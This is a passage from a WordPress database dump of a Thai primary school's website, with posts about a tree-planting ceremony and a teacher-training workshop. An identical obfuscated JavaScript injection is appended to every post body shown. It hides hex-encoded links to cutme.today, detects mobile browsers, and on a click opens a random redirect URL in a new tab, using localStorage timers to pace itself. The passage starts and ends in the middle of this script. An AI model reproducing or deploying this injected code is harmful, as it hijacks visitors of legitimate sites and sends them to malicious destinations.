_0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์ \"พิธีไหว้ครู 2567\"','','inherit','closed','closed','','432-revision-v1','','','2024-08-01 20:51:18','2024-08-01 13:51:18','',432,'http://pakhaeng.ssk.in.th/?p=434',0,'revision','',0),
(435,1,'2024-08-01 20:52:33','2024-08-01 13:52:33','<!-- wp:paragraph -->\n<p><strong>วันที่ 13 มิถุนายน พ.ศ.2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ จัดกิจกรรมปลูกต้นไม้เฉลิมพระเกียรติฯ “ 1 คน 1 ต้น “ เพื่อคนไทยอนาคต เนื่องในวันต้นไม้ประจำปีของชาติ ปี 2567 โดยมีท่านผู้อำนวยการเสน่หา พลโสภา พร้อมด้วยคณะครูและบุคลากรทางการศึกษา นำนักเรียนร่วมกิจกรรมปลูกต้นไม้ในครั้งนี้</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":436,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/22-67-724x1024.png\" alt=\"\" class=\"wp-image-436\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์ \" ปลูกต้นไม้เฉลิมพระเกียรติ\"','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-%e0%b8%9b%e0%b8%a5','','','2024-08-01 20:52:35','2024-08-01 13:52:35','',0,'http://pakhaeng.ssk.in.th/?p=435',0,'post','',0),
(436,1,'2024-08-01 20:52:23','2024-08-01 13:52:23','','22-67','','inherit','','closed','','22-67','','','2024-08-01 20:52:23','2024-08-01 13:52:23','',435,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/22-67.png',0,'attachment','image/png',0),
(437,1,'2024-08-01 20:52:33','2024-08-01 13:52:33','<!-- wp:paragraph -->\n<p><strong>วันที่ 13 มิถุนายน พ.ศ.2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ จัดกิจกรรมปลูกต้นไม้เฉลิมพระเกียรติฯ “ 1 คน 1 ต้น “ เพื่อคนไทยอนาคต เนื่องในวันต้นไม้ประจำปีของชาติ ปี 2567 โดยมีท่านผู้อำนวยการเสน่หา พลโสภา พร้อมด้วยคณะครูและบุคลากรทางการศึกษา นำนักเรียนร่วมกิจกรรมปลูกต้นไม้ในครั้งนี้</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":436,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/22-67-724x1024.png\" alt=\"\" class=\"wp-image-436\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์ \" ปลูกต้นไม้เฉลิมพระเกียรติ\"','','inherit','closed','closed','','435-revision-v1','','','2024-08-01 20:52:33','2024-08-01 13:52:33','',435,'http://pakhaeng.ssk.in.th/?p=437',0,'revision','',0),
(438,1,'2024-08-01 20:53:53','2024-08-01 13:53:53','<!-- wp:paragraph -->\n<p><strong></strong><strong>เมื่อวันที่ 14 มิถุนายน พ.ศ.2567 นางเสน่หา</strong><strong> </strong><strong>พลโสภา ผู้อำนวยการโรงเรียนบ้านหนองปลาเข็ง กอไหล่ และคณะครูร่วมเป็นวิทยากร โครงการอบรมขยายผลเชิงปฏิบัติการการจัดการเรียนรวม (SET) การพัฒนาและเสริมสร้างศักยภาพผู้เรียนที่มีความสามารถพิเศษบนฐานพหุปัญญา (MI) การอบรมเพื่อพัฒนาและเสริมสร้างศักยภาพผู้เรียนตามความแตกต่างระหว่างบุคคล (DI) ณ โรงเรียนบ้านดินดำเหล่าเสนไต้</strong><strong></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong></strong><strong>โดยมีนางปุณิกา</strong><strong> </strong><strong>ธรรมนูญ รองฯผอ.สพป.ศรีสะเกษ เขต 1 เป็นประธานเปิดการอบรมในครั้งนี้</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":439,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/23-67-724x1024.png\" alt=\"\" class=\"wp-image-439\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\